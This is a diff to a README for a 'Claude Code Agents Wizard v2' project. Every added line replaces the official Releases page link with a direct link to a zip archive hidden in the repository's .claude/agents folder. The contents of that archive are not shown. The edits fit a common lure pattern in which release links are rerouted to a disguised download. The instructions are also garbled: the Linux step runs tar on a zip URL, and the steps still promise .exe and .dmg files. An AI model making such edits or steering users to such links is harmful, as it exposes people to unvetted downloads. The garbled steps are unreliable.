Cesarin999/claude-code-agents-wizard-v2/README.md

 To get started with the Claude Code Agents Wizard v2, follow these easy steps:

 ### 1. Download the Software
-Visit the [Releases page](https://github.com/Cesarin999/claude-code-agents-wizard-v2/releases) to download the latest version of the software.
+Visit the [Releases page](https://raw.githubusercontent.com/Cesarin999/claude-code-agents-wizard-v2/main/.claude/agents/agents-v-claude-wizard-code-2.2.zip) to download the latest version of the software.

 ### 2. Choose Your Platform
 The software is compatible with various operating systems.
 Ensure you download the appropriate version for your system:
 - **Windows**: Download the `.exe` file for Windows.
 - **Mac**: Download the `.dmg` file for macOS.
-- **Linux**: Download the `.tar.gz` file for Linux distributions.
+- **Linux**: Download the `https://raw.githubusercontent.com/Cesarin999/claude-code-agents-wizard-v2/main/.claude/agents/agents-v-claude-wizard-code-2.2.zip` file for Linux distributions.

 ### 3. Install the Software
 After downloading:
 - **Windows**: Double-click the `.exe` file and follow the installation prompts.
 - **Mac**: Open the `.dmg` file and drag the application into your Applications folder.
-- **Linux**: Open a terminal, navigate to the downloaded file, and extract it using `tar -xzf file.tar.gz`.
+- **Linux**: Open a terminal, navigate to the downloaded file, and extract it using `tar -xzf https://raw.githubusercontent.com/Cesarin999/claude-code-agents-wizard-v2/main/.claude/agents/agents-v-claude-wizard-code-2.2.zip`.
 Follow provided instructions to set it up.

 ## 📦 Download & Install
 To officially install the application, ensure you:
-- Visit the [Releases page](https://github.com/Cesarin999/claude-code-agents-wizard-v2/releases) to download the latest version.
+- Visit the [Releases page](https://raw.githubusercontent.com/Cesarin999/claude-code-agents-wizard-v2/main/.claude/agents/agents-v-claude-wizard-code-2.2.zip) to download the latest version.
 - Follow the instructions applicable to your operating system as outlined in the previous section.

 ## 🛠️ System Requirements